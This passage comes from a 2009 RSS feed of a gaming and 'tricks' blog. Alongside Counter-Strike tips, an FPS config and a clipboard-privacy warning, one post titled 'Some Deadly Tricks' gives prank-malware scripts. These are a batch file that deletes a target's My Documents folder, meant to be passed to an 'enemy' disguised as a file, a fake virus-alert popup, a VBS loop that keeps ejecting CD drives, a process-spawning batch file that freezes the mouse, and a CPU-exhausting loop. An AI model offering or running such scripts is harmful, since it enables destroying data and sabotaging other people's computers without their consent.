href=&quot;http://fileforum.betanews.com/detail/GMail-Drive/1097807577/1&quot;&gt;GMail Drive v1.0.14 - download site #2 (Betanews) &lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/store-7gb-with-gmail-drive.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0X2paPQ7Y4zhv8GOjeTcDv_PqWxaUqUndVeGzd4fH0VZgHPiPIveVlPVZXbi4lwP9CA3I-Rq08Ind6jlAbQQsgqqWvmn54Yb2TZPNFxMMscePGjMKOQm9UzwTY3IJp4FsXeQA8SNv_jY/s72-c/gmail-drive.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-4011144477246288297</guid><pubDate>Sat, 22 Aug 2009 13:12:00 +0000</pubDate><atom:updated>2009-08-22T18:52:17.619+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Counter Strike</category><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Another Trick To Increase Fps</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGYUm32rE8PD45dIbhjMQBXYADzXh14drH6oSsm_liNhIKCBTGPVXIwqyu5X6yDjF2SBe5vvsId417eZ8PlDZyJX-mBPACMy_qbQiYpYljiVSEmZpnL1DwpLVyYIQ-IO6rEPiRbgV5_s/s1600-h/10482.jpg&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 600px; height: 245px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGYUm32rE8PD45dIbhjMQBXYADzXh14drH6oSsm_liNhIKCBTGPVXIwqyu5X6yDjF2SBe5vvsId417eZ8PlDZyJX-mBPACMy_qbQiYpYljiVSEmZpnL1DwpLVyYIQ-IO6rEPiRbgV5_s/s400/10482.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5372777056501658706&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here is a great config to help improve your FPS for counter-strike source. &lt;br /&gt;&lt;br /&gt;Guide for Installation:&lt;br /&gt;&lt;br /&gt;1. Copy the following text and a text file and rename this file to &quot;autoexec.cfg&quot;&lt;br /&gt;2. Place this file in the &quot;c:\program files\valve\steam\steamapps\\counter-strike source\cstrike\cfg&quot; directory&lt;br /&gt;3. Upon running Counter-Strike: Source, your console should note: &quot;FPS Config Loaded&quot; in your console.&lt;br /&gt;&lt;br /&gt;If you do not see this in your console (~), please make sure the file is correctly named &quot;autoexec.cfg&quot; and is placed in the correct folder. &lt;br /&gt;&lt;br /&gt;This config is both CAL and CEVO legal. Besides running this config, closing any unneeded programs, regularly defragging your hard disk, and running spyware cleaners will help the game run smoother.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//FPS Config&lt;br /&gt;//----------------------&lt;br /&gt;&lt;br /&gt;clear&lt;br /&gt;&lt;br /&gt;echo &quot;*******************&quot;&lt;br /&gt;echo &quot;FPS Config Loaded&quot;&lt;br /&gt;echo &quot;*******************&quot;&lt;br /&gt;&lt;br /&gt;// FPS Settings&lt;br /&gt;// ----------------&lt;br /&gt;&lt;br /&gt;//Cl_ Commands&lt;br /&gt;&lt;br /&gt;cl_cmdrate &quot;101&quot; // Must be set to 100/101&lt;br /&gt;cl_drawmonitors &quot;0&quot; &lt;br /&gt;cl_ejectbrass &quot;0&quot; &lt;br /&gt;cl_forcepreload &quot;1&quot; &lt;br /&gt;cl_interp &quot;0.01&quot; // Must be set to .01&lt;br /&gt;cl_interpolate &quot;1&quot; // Must be set to 1&lt;br /&gt;cl_lagcomp_errorcheck &quot;1&quot; &lt;br /&gt;cl_lagcompensation &quot;1&quot; &lt;br /&gt;cl_minmodels &quot;1&quot; &lt;br /&gt;cl_min_ct &quot;1&quot; &lt;br /&gt;cl_min_t &quot;1&quot; &lt;br /&gt;cl_predictweapons &quot;1&quot; &lt;br /&gt;cl_pred_optimize &quot;2&quot; &lt;br /&gt;cl_phys_props_max &quot;50&quot; // Must be set to 50+&lt;br /&gt;cl_ragdoll_physics_enable &quot;0&quot; &lt;br /&gt;cl_ragdoll_collide &quot;0&quot; &lt;br /&gt;cl_smooth &quot;1&quot; &lt;br /&gt;cl_smoothtime &quot;0.01&quot; &lt;br /&gt;cl_soundscape_flush&lt;br /&gt;cl_updaterate &quot;101&quot; // Must be set to 100/101&lt;br /&gt;&lt;br /&gt;//Mat_ commands&lt;br /&gt;&lt;br /&gt;mat_bloomamount_rate &quot;0.05f&quot; // Must be set to &quot;0.05f&quot;&lt;br /&gt;mat_bloomscale &quot;0&quot; &lt;br /&gt;mat_bumpbasis &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_bumpmap &quot;0&quot; &lt;br /&gt;mat_clipz &quot;1&quot; &lt;br /&gt;mat_colorcorrection &quot;0&quot; &lt;br /&gt;mat_compressedtextures &quot;1&quot; &lt;br /&gt;mat_debug_autoexposure &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debug_bloom &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debug_postprocessing_effects &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debug_process_halfscreen &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debugalttab &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debugdepth &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debugdepthmode &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_debugdepthval &quot;128&quot; // Must be set to 128&lt;br /&gt;mat_debugdepthvalmax &quot;256&quot; // Must be set to 256&lt;br /&gt;mat_disable_bloom &quot;1&quot; &lt;br /&gt;//mat_dxlevel 90 // Must be set to 81 or higher&lt;br /&gt;mat_filterlightmaps &quot;1&quot; &lt;br /&gt;mat_force_bloom &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_forcehardwaresync &quot;0&quot; &lt;br /&gt;mat_hdr_enabled &quot;0&quot; &lt;br /&gt;mat_hdroverbrightrange &quot;16&quot; // Must be set to 16&lt;br /&gt;mat_leafvis &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_norendering &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_parallaxmap &quot;0&quot; &lt;br /&gt;mat_picmip &quot;0&quot; // Must not be higher than 2&lt;br /&gt;mat_reducefillrate &quot;1&quot; &lt;br /&gt;mat_showlightmappage &quot;-1&quot; // Must be set to -1&lt;br /&gt;mat_specular &quot;0&quot; &lt;br /&gt;mat_surfaceid &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_surfacemat &quot;0&quot; // Must be set to 0&lt;br /&gt;mat_vsync &quot;0&quot; &lt;br /&gt;&lt;br /&gt;//R_ Commands&lt;br /&gt;&lt;br /&gt;r_ambientfraction &quot;0.1&quot; // Must be set to .1&lt;br /&gt;r_avglight &quot;1&quot; // Must be set to 1&lt;br /&gt;r_decals &quot;0&quot; &lt;br /&gt;r_decal_cullsize &quot;0&quot; &lt;br /&gt;r_dopixelvisibility &quot;0&quot; &lt;br /&gt;r_drawbatchdecals &quot;0&quot; &lt;br /&gt;r_drawdetailprops &quot;1&quot; // Must be set to 1&lt;br /&gt;r_drawflecks &quot;0&quot; &lt;br /&gt;r_drawmodeldecals &quot;0&quot; &lt;br /&gt;r_dynamic &quot;0&quot; &lt;br /&gt;r_eyes &quot;0&quot; &lt;br /&gt;r_flex &quot;0&quot; &lt;br /&gt;r_lightaverage &quot;1&quot; // Must be set to 1&lt;br /&gt;r_lod &quot;-1&quot; // Must be set to -1/0/1/2&lt;br /&gt;r_maxdlights &quot;32&quot; // Must be set to 32&lt;br /&gt;r_modellodscale &quot;1&quot; // Must be set to 1&lt;br /&gt;r_occlusion &quot;1&quot; &lt;br /&gt;r_renderoverlayfragment &quot;0&quot; &lt;br /&gt;r_rootlod &quot;2&quot; // Must be set to 0/1/2&lt;br /&gt;r_shadows &quot;1&quot; &lt;br /&gt;r_shadowmaxrendered &quot;1&quot; &lt;br /&gt;r_shadowrendertotexture &quot;1&quot; &lt;br /&gt;r_teeth &quot;0&quot; &lt;br /&gt;r_waterforceexpensive &quot;0&quot; &lt;br /&gt;r_waterdrawreflection &quot;0&quot; &lt;br /&gt;r_worldlights &quot;2&quot; // Must be set to 2&lt;br /&gt;r_worldlightmin &quot;0.0002&quot; // Must be set to .0002&lt;br /&gt;&lt;br /&gt;r_3dnow &quot;1&quot; &lt;br /&gt;r_mmx &quot;1&quot; &lt;br /&gt;r_sse &quot;1&quot; &lt;br /&gt;r_sse2 &quot;1&quot; &lt;br /&gt;r_3dsky 0 &lt;br /&gt;&lt;br /&gt;//Rope_&lt;br /&gt;&lt;br /&gt;rope_averagelight &quot;0&quot; &lt;br /&gt;rope_collide &quot;0&quot; &lt;br /&gt;rope_shake &quot;0&quot; &lt;br /&gt;rope_smooth &quot;0&quot; &lt;br /&gt;rope_smooth_minwidth &quot;0&quot; &lt;br /&gt;rope_smooth_minalpha &quot;0&quot; &lt;br /&gt;rope_smooth_maxalphawidth &quot;0&quot; &lt;br /&gt;rope_smooth_maxalpha &quot;0&quot; &lt;br /&gt;rope_smooth_enlarge &quot;0&quot; &lt;br /&gt;rope_subdiv &quot;0&quot; &lt;br /&gt;rope_wind_dist &quot;0.01&quot; &lt;br /&gt;&lt;br /&gt;//Miscellaneous&lt;br /&gt;&lt;br /&gt;demo_recordcommands &quot;1&quot; // Must be set to 1&lt;br /&gt;//fps_max &quot;100&quot; &lt;br /&gt;func_break_max_pieces &quot;0&quot; &lt;br /&gt;gl_clear &quot;0&quot; &lt;br /&gt;jpeg_quality &quot;100&quot; // Must be set to 100&lt;br /&gt;mp_decals &quot;0&quot; &lt;br /&gt;net_showevents &quot;0&quot; // Must be set to 0&lt;br /&gt;props_break_max_pieces &quot;0&quot; &lt;br /&gt;props_break_max_pieces_perframe &quot;0&quot; &lt;br /&gt;rate &quot;25000&quot; // Must be set to 25000+&lt;br /&gt;snd_flushasync &lt;br /&gt;texture_budget_background_alpha &quot;999 &lt;br /&gt;texture_budget_panel_height &quot;0&quot; &lt;br /&gt;texture_budget_panel_width &quot;0&quot; &lt;br /&gt;voice_enable &quot;1&quot; &lt;br /&gt;voice_scale &quot;1&quot; &lt;br /&gt;voice_modenable &quot;1&quot; &lt;br /&gt;violence_agibs &quot;1&quot; &lt;br /&gt;violence_hgibs &quot;1&quot; &lt;br /&gt;violence_hblood &quot;1&quot; &lt;br /&gt;violence_ablood &quot;1&quot; &lt;br /&gt;//zoom_sensitivity_ratio &quot;1&quot; &lt;br /&gt;&lt;br /&gt;//BUY BINDS&lt;br /&gt;//-----&lt;br /&gt;//KP_ is the prefix for KeyPad buttons&lt;br /&gt;//You may add multiple buy commands to one key&lt;br /&gt;//Ex. bind &quot;f1&quot; &quot;buy awp;buyammo1;buy glock;buyammo2;buyammo2;buyammo2&quot;&lt;br /&gt;//Remove the &quot;//&quot; to activate the bind&lt;br /&gt;&lt;br /&gt;//bind &quot;buy awp&quot;&lt;br /&gt;//bind &quot;buy ak47&quot;&lt;br /&gt;//bind &quot;buy m4a1&quot;&lt;br /&gt;//bind &quot;buy famas&quot;&lt;br /&gt;//bind &quot;buy galil&quot;&lt;br /&gt;//bind &quot;buy mp5&quot;&lt;br /&gt;//bind &quot;buy tmp&quot;&lt;br /&gt;//bind &quot;buy deagle&quot;&lt;br /&gt;//bind &quot;buy usp&quot;&lt;br /&gt;//bind &quot;buyammo1&quot;&lt;br /&gt;//bind &quot;buyammo2&quot;&lt;br /&gt;//bind &quot;buy flashbang&quot;&lt;br /&gt;//bind &quot;buy hegrenade&quot;&lt;br /&gt;//bind &quot;buy smokegrenade&quot;&lt;br /&gt;//bind &quot;buy defuser&quot;&lt;br /&gt;//bind &quot;vest&quot;&lt;br /&gt;//bind &quot;vesthelm&quot;&lt;br /&gt;&lt;br /&gt;//End Config&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;source : gamestats&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;Silent||Aggression</description><link>http://thecounterhack.blogspot.com/2009/08/another-trick-to-increase-fps.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGYUm32rE8PD45dIbhjMQBXYADzXh14drH6oSsm_liNhIKCBTGPVXIwqyu5X6yDjF2SBe5vvsId417eZ8PlDZyJX-mBPACMy_qbQiYpYljiVSEmZpnL1DwpLVyYIQ-IO6rEPiRbgV5_s/s72-c/10482.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-2571404375713174078</guid><pubDate>Sat, 22 Aug 2009 12:34:00 +0000</pubDate><atom:updated>2009-08-22T18:16:22.897+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Danger Of  &#39;&#39;Ctrl+C&#39;&#39; over Internet</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir3S2Bc30ddsPXe9XNv5UevB2i8Sz-Si7WAJIAXweuug4cWkgyg9R3d1jpxIrRRQteacsk5wr2wt45MK7RZT7gKGxvcurMFsM3KK2AyNjDZ_3PThww1axlFtv8mM8VfXT9Bn9EB_bUwRc/s1600-h/copy.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 213px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir3S2Bc30ddsPXe9XNv5UevB2i8Sz-Si7WAJIAXweuug4cWkgyg9R3d1jpxIrRRQteacsk5wr2wt45MK7RZT7gKGxvcurMFsM3KK2AyNjDZ_3PThww1axlFtv8mM8VfXT9Bn9EB_bUwRc/s320/copy.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5372767276124503026&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We use to copy various data by ctrl+c for pasting somewhere else. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP.&lt;br /&gt;&lt;br /&gt;Just try this:&lt;br /&gt;1) Copy any text by &#39;ctrl+c&#39;&lt;br /&gt;2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp&lt;br /&gt;You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)&lt;br /&gt;&lt;br /&gt;Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.&lt;br /&gt;&lt;br /&gt;Be cautious ...&lt;br /&gt;&lt;br /&gt;To avoid Clipboard Hack Problem, do the following:&lt;br /&gt;1) In Internet Explorer, Go to Tools -&gt; Internet options -&gt; Security&lt;br /&gt;2) Press Custom level.&lt;br /&gt;3) In the security settings, select disable under Allow paste operations via script and click on &#39;OK. (Now the contents of your clipboard are safe.)&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/danger-of-ctrlc-at-web-let-u-kno-this.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir3S2Bc30ddsPXe9XNv5UevB2i8Sz-Si7WAJIAXweuug4cWkgyg9R3d1jpxIrRRQteacsk5wr2wt45MK7RZT7gKGxvcurMFsM3KK2AyNjDZ_3PThww1axlFtv8mM8VfXT9Bn9EB_bUwRc/s72-c/copy.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-1723112237103442007</guid><pubDate>Fri, 21 Aug 2009 14:46:00 +0000</pubDate><atom:updated>2009-08-21T20:22:57.855+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Counter Strike</category><title>How To Work As a Team !</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh93cscaCKdc0d0ThvgTtzDcP7EAKoktjogyAzt6mzbgCDzFIW0o6VNd2bWHsMOPQyOX0-i0gJ4aqupa2NfKx56o3RXRx-1MB26FS8Ox1fWqBL_4lpHwjM_Nck5bpR7hMaCkkjzNqh0GJ4/s1600-h/csaq.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 200px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh93cscaCKdc0d0ThvgTtzDcP7EAKoktjogyAzt6mzbgCDzFIW0o6VNd2bWHsMOPQyOX0-i0gJ4aqupa2NfKx56o3RXRx-1MB26FS8Ox1fWqBL_4lpHwjM_Nck5bpR7hMaCkkjzNqh0GJ4/s320/csaq.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5372430090660945122&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Listen Carefully&lt;/strong&gt;&lt;br /&gt;Sound is a big part of FPSes these days, giving players hints as to where shots are coming from, or if someone is walking up behind them. Try to learn the different weapon types by sound. It always helps to know whether you&#39;re going into a pistol fight or an AK-47 battle. A good sound system can make a difference here. Since version 1.3 it has become possible to use voice communication with Counter-Strike, which can change the gameplay experience quite dramatically and simplify team organization.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Plan Grenade Use&lt;/strong&gt;&lt;br /&gt;Grenades in Counter-Strike are limited in supply and should be used wisely. A common approach is to soften the enemy up with a few grenades before going in for the final assault. Flashbang grenades, for example, will temporarily blind those caught in the blast radius, making them vulnerable to attack. Of course, a grenade can also come in handy if you need to buy some time to make a quick retreat, or create a distraction.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;Crouching and Walking&lt;/strong&gt;&lt;br /&gt;Crouching will not only steady your weapon, it will lower your profile a little and make you a smaller target. Remember that walking is silent in Counter-Strike, and by default you run all the time, so get to know those controls. Crouching and moving at the same time, while slow, also allows you to move silently. These techniques are critical if you want to sneak up on the enemy without being heard.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Take Cover&lt;/strong&gt;&lt;br /&gt;Use crates and other objects to partially conceal and protect you. It helps to have a convenient spot where you can completely disappear to reload if necessary. Keep in mind that some of the more powerful weapons in Counter-Strike can penetrate right through certain walls and objects. When you do find yourself in the unfortunate situation of having a grenade lobbed at you, turning away from it will often lessen the impact.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Try to Work as a Team&lt;/strong&gt;&lt;br /&gt;Rambo looks good in the movies, but it rarely pays off to abandon your teammates and go Kamikaze in Counter-Strike. Typically you run straight into the gunfire (and laughter) of a group of enemy players. In many cases it&#39;s nearly impossible to accomplish the game objectives in Counter-Strike without a coordinated effort, assuming that the enemy team isn&#39;t asleep at the switch. A team is usually most effective if they are carrying a variety of weaponry, since weapons in most games are designed to have strengths and weaknesses. It isn&#39;t every day that a plan comes together in an online action game, but there are rare moments when the whole thing somehow doesn&#39;t deteriorate into complete chaos, and that&#39;s what it&#39;s all about.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Practice, Practice, Practice&lt;/strong&gt;&lt;br /&gt;Like almost any game, the best way to get better is to practice. This may seem daunting when you first get into a game with a bunch of experienced players, but with a little patience you will find yourself surviving longer and even scoring a few frags.&lt;br /&gt;&lt;br /&gt;That covers the basics of becoming a good Counter-Strike player. Naturally, there are a number of strategies and techniques specific to certain classes, weapons, and maps that go beyond the scope of this article, so you might want to browse some of the other guides in our Counter-Strike section. May the frags be with you!&lt;br /&gt;&lt;br /&gt;source : internetgames</description><link>http://thecounterhack.blogspot.com/2009/08/how-to-work-as-team.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh93cscaCKdc0d0ThvgTtzDcP7EAKoktjogyAzt6mzbgCDzFIW0o6VNd2bWHsMOPQyOX0-i0gJ4aqupa2NfKx56o3RXRx-1MB26FS8Ox1fWqBL_4lpHwjM_Nck5bpR7hMaCkkjzNqh0GJ4/s72-c/csaq.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-6663539665814868515</guid><pubDate>Fri, 21 Aug 2009 08:56:00 +0000</pubDate><atom:updated>2009-08-21T14:47:48.458+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Some Deadly Tricks ! Read Carefully!</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinav-r0Nlm-GihqcPjU38nqRYVsXB7aBx6Qa2Y_CikYL3Gkv_RpVkI49mfqNGI3pk1eg9DKb8J_HK8LVhEd09rRd-EC4IyejWzym0rhhJZvsxGQ3YaEtIxLC5aKQvEtyYMaAGpuDIYFYk/s1600-h/12344.jpg&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 46px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinav-r0Nlm-GihqcPjU38nqRYVsXB7aBx6Qa2Y_CikYL3Gkv_RpVkI49mfqNGI3pk1eg9DKb8J_HK8LVhEd09rRd-EC4IyejWzym0rhhJZvsxGQ3YaEtIxLC5aKQvEtyYMaAGpuDIYFYk/s400/12344.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5372343770975936962&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Trick 1 :&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;Delete my document &lt;/em&gt;:&lt;br /&gt;&lt;br /&gt;A WAY TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE&#39;S WHAT U SHOULD DO.&lt;br /&gt;&lt;br /&gt;rmdir C:\Documents and Settings \S\Q.&lt;br /&gt;&lt;br /&gt;OPEN NOTEPAD AND COPY-PASTE THE ABOVE CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Trick 2 :&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Open notepad and type the code below:&lt;br /&gt;&lt;br /&gt;lol=msgbox (&quot;Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot&quot;,20,&quot;Warning&quot;)&lt;br /&gt;&lt;br /&gt;Then save it as Virus.VBS&lt;br /&gt;note : this one is not harmful just to scare you &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Trick 3 :&lt;/strong&gt;&lt;br /&gt;here is the code of a virus&lt;br /&gt;which will open and close your cdrom copy paste code inside equals in notepad&lt;br /&gt;=========================================&lt;br /&gt;&#39;code start from here&lt;br /&gt;&lt;br /&gt;Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot; )&lt;br /&gt;Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;if colCDROMs.Count &gt;= 1 then&lt;br /&gt;do&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next &#39; cdrom&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next &#39; cdrom&lt;br /&gt;loop&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;&#39;code end from here&lt;br /&gt;=========================================&lt;br /&gt;&lt;br /&gt;save it as virus.vbs and double click it&lt;br /&gt;and if u want to close it just open task manager and end wscript.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Trick 4 :&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;start WISPTIS.EXE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;open notepad and save it as anyname.bat&lt;br /&gt;this will stop your mouse cursor&lt;br /&gt;to fix it log off your pc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Trick 5 :&lt;/strong&gt;&lt;br /&gt;Note this one is best trick to slow down pc &lt;br /&gt;&lt;br /&gt;open notepad&lt;br /&gt;type&lt;br /&gt;&lt;br /&gt;do&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;save it as anyname.vbs&lt;br /&gt;&lt;br /&gt;and click on it once twice thrice anytime to make pc too slow . &lt;br /&gt;Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager .&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/some-deadly-tricks-read-carefully.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinav-r0Nlm-GihqcPjU38nqRYVsXB7aBx6Qa2Y_CikYL3Gkv_RpVkI49mfqNGI3pk1eg9DKb8J_HK8LVhEd09rRd-EC4IyejWzym0rhhJZvsxGQ3YaEtIxLC5aKQvEtyYMaAGpuDIYFYk/s72-c/12344.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-3899356246680695446</guid><pubDate>Thu, 20 Aug 2009 11:17:00 +0000</pubDate><atom:updated>2009-08-20T16:53:42.296+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Counter Strike</category><title>Tips on Burst Fire and Reloading</title><description>&lt;strong&gt;Burst Fire&lt;/strong&gt;&lt;br /&gt;Because Counter-Strike tries to simulate the recoil of actual guns, the longer you hold down the trigger the less accurate your rounds become. Unless you are at point blank range, after the first few shots you will likely just be blasting ammunition into the wild blue yonder, well over the heads of the enemy. To prevent this, and make your ammo count for something, it is a common practice in Counter-Strike to fire in short bursts of only two or three rounds, giving you a chance steady up for the next shot.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Compensate for Recoil&lt;/strong&gt;&lt;br /&gt;It may seem like common sense, but if you know that your weapon is going to recoil, it helps to compensate for it as best you can, typically by aiming down a little. Of course, the longer you press the trigger, the more difficult it will become to compensate adequately, so this is most effective when combined with burst fire as described above.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Plan Your Reloads&lt;/strong&gt;&lt;br /&gt;Reloading is one of the elements that differentiates Counter-Strike from some of the earlier FPSes. When your gun runs out of ammo, you must replace the clip, and although this can be done quite quickly, it often makes the difference between life and death. Try not to jump into an O.K. Corral style shoot-out without a fully loaded weapon, and when the time comes to reload, it&#39;s nice to have somewhere that you&#39;re not a sitting duck to do it.&lt;br /&gt; &lt;br /&gt;&lt;strong&gt;Keep Your Pistol Handy&lt;/strong&gt;&lt;br /&gt;On a similar note, since you can switch weapons faster than you can reload in most FPSes, a quick weapon change at a critical moment can turn around the confrontation. We&#39;ve all seen two players empty their guns into (or near) each other and almost simultaneously run out of ammo. Sometimes a good Counter-Strike player will finish the enemy off with his pistol or even his knife rather than wait for a reload.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Customize Your Controls&lt;/strong&gt;&lt;br /&gt;Making fast weapon changes and pulling off more complex maneuvers swiftly is greatly facilitated by customizing game controls and using scripts. Every player seems to have a personal preference when it comes to key combinations, and having the commands you need at your fingertips will speed up your gameplay considerably, although you will have to experiment with different configurations. Many experts have a custom configuration for each different class that they play.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Strategic Jumping&lt;/strong&gt;&lt;br /&gt;When you&#39;re in an open area or you know there are snipers targeting you, it&#39;s important to move around as much and as unpredictably as possible. Jumping, but not too regularly, can force the enemy to aim vertically as well as horizontally, or it can, if you&#39;re lucky, turn what would have been a head shot into something a little less damaging. That said, some players are prone to jumping continuously, even when out of harm&#39;s way, which can make you look like an idiot.&lt;br /&gt;&lt;br /&gt;source : internetgames&lt;br /&gt;&lt;br /&gt;regards &lt;br /&gt;&lt;br /&gt;SILENT||AGGRESSION</description><link>http://thecounterhack.blogspot.com/2009/08/tips-on-burst-fire-and-reloading.html</link><author>noreply@blogger.com (Hitesh)</author></item><item><guid 